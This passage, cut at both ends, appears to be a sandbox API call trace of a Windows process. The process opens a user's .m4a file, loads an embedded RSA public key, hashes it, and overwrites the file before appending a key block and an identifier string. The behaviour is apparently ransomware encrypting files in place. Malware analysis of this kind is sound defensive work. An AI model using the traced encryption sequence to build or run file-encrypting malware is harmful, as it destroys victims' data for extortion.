TO95hR3JMn6Z\\cYVyaoVP6_8ikj.m4a") returned=".m4a" [0197.042] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\cYVyaoVP6_8ikj.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\cyvyaovp6_8ikj.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0197.043] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=6841) returned 1 [0197.043] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0197.046] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x1a93, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.046] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0197.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.048] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.048] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x1ab9, lpOverlapped=0x0) returned 1 [0197.049] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0197.049] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.049] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.049] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0197.050] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0197.050] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.050] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0197.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0197.050] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0197.050] GetLastError () returned 0x0 [0197.050] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0197.050] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0197.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0197.051] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0197.051] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0197.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.051] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0197.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1ac0) returned 0x2d4f778 [0197.051] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0197.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0197.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0197.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d088 [0197.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a300 [0197.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d0d0 [0197.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a318 [0197.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a348 [0197.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3a8 [0197.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a360 [0197.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0197.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0197.052] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0197.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0197.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a348 | out: hHeap=0x6a0000) returned 1 [0197.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a360 | out: hHeap=0x6a0000) returned 1 [0197.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3a8 | out: hHeap=0x6a0000) returned 1 [0197.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0197.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3a8 [0197.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37800 [0197.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a360 [0197.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0197.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a348 [0197.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0197.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0197.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0197.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0197.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0197.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bec8 [0197.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0197.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0197.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a360 | out: hHeap=0x6a0000) returned 1 [0197.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a348 | out: hHeap=0x6a0000) returned 1 [0197.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3a8 | out: hHeap=0x6a0000) returned 1 [0197.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0197.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0197.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0197.055] GetCurrentThreadId () returned 0x264 [0197.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0197.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4b820 [0197.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0197.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0197.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0197.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0197.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0197.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.055] GetCurrentThreadId () returned 0x264 [0197.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0197.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0197.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0197.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0197.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0197.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3a8 [0197.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0197.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0197.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0197.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0197.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a348 [0197.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0197.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0197.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0197.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0197.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a360 [0197.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0197.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0197.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0197.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a330 [0197.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0197.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3c0 [0197.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0197.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a390 [0197.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a378 [0197.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3d8 [0197.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a378 | out: hHeap=0x6a0000) returned 1 [0197.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a378 [0197.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a390 | out: hHeap=0x6a0000) returned 1 [0197.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0197.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0197.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0197.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a348 | out: hHeap=0x6a0000) returned 1 [0197.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a348 [0197.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0197.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3a8 | out: hHeap=0x6a0000) returned 1 [0197.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bfe0 [0197.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3d8 | out: hHeap=0x6a0000) returned 1 [0197.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0197.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0197.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0197.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0197.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a348 | out: hHeap=0x6a0000) returned 1 [0197.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0197.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0197.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0197.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0197.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0197.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0197.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0197.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0197.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0197.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a378 | out: hHeap=0x6a0000) returned 1 [0197.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3c0 | out: hHeap=0x6a0000) returned 1 [0197.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a360 | out: hHeap=0x6a0000) returned 1 [0197.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a330 | out: hHeap=0x6a0000) returned 1 [0197.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0197.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0197.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0197.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a318 | out: hHeap=0x6a0000) returned 1 [0197.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d0d0 | out: hHeap=0x6a0000) returned 1 [0197.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0197.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0197.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0197.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0197.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0197.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0197.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0197.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0197.066] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4f778*, nNumberOfBytesToWrite=0x1ab4, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4f778*, lpNumberOfBytesWritten=0x30ffb14*=0x1ab4, lpOverlapped=0x0) returned 1 [0197.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4f778 | out: hHeap=0x6a0000) returned 1 [0197.066] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x1ab9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.066] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0197.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0197.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0197.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0197.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0197.068] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0197.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.068] lstrlenA 